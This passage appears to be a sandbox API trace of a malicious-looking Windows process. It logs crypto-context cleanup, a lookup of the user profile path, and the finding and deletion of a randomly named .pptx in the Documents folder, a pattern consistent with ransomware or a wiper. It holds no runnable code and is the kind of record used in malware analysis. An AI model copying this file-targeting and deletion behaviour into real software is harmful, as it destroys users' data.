| out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.172] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.172] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0266.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0266.172] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0266.172] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0266.172] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0266.173] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0266.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0266.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0266.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0266.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.173] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.173] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.173] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.174] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0266.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0266.174] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.174] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0266.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0266.174] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.174] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0266.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69988, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0266.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.175] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0266.175] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.175] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0266.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0266.175] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.176] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0266.176] FreeLibrary (hLibModule=0x756e0000) returned 1 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.176] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.176] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.176] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0266.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518b0 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0266.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51658 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0266.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.177] CloseHandle (hObject=0x2a0) returned 1 [0266.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0266.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0266.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0266.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0266.181] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0266.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0266.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0266.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51760 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517a8 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51868 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0266.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0266.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.182] CloseHandle (hObject=0x2d0) returned 1 [0266.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0266.185] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0266.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0266.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3aae8 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54800 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0266.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54698 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54760 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54580 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54828 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54788 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54670 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0266.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0266.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0266.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54710 | out: hHeap=0x970000) returned 1 [0266.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0266.189] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0266.189] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0266.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0266.189] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/MvKsZ2f3N9SAK.pptx", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\MvKsZ2f3N9SAK.pptx", lpFilePart=0x8cedf4*="MvKsZ2f3N9SAK.pptx") returned 0x2c [0266.190] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\MvKsZ2f3N9SAK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mvksz2f3n9sak.pptx")) returned 0x20 [0266.190] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\MvKsZ2f3N9SAK.pptx", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37aaf350, ftCreationTime.dwHighDateTime=0x1d58910, ftLastAccessTime.dwLowDateTime=0x9afaf140, ftLastAccessTime.dwHighDateTime=0x1d58b71, ftLastWriteTime.dwLowDateTime=0x9afaf140, ftLastWriteTime.dwHighDateTime=0x1d58b71, nFileSizeHigh=0x0, nFileSizeLow=0x53c8, dwReserved0=0x1, dwReserved1=0x1c, cFileName="MvKsZ2f3N9SAK.pptx", cAlternateFileName="MVKSZ2~1.PPT")) returned 0xa87610 [0266.190] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\MvKsZ2f3N9SAK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mvksz2f3n9sak.pptx")) returned 1 [0266.194] FindNextFileW (in: hFindFile=0xa87610, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37aaf350, ftCreationTime.dwHighDateTime=0x1d58910, ftLastAccessTime.dwLowDateTime=0x9afaf140, ftLastAccessTime.dwHighDateTime=0x1d58b71, ftLastWriteTime.dwLowDateTime=0x9afaf140, ftLastWriteTime.dwHighDateTime=0x1d58b71, nFileSizeHigh=0x0, nFileSizeLow=0x53c8, dwReserved0=0x1, dwReserved1=0x1c, cFileName="MvKsZ2f3N9SAK.pptx", cAlternateFileName="MVKSZ2~1.PPT")) returned 0 [0266.194] FindClose (in: hFindFile=0xa87610 | out: hFindFile=0xa87610) returned 1 [0266.195] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 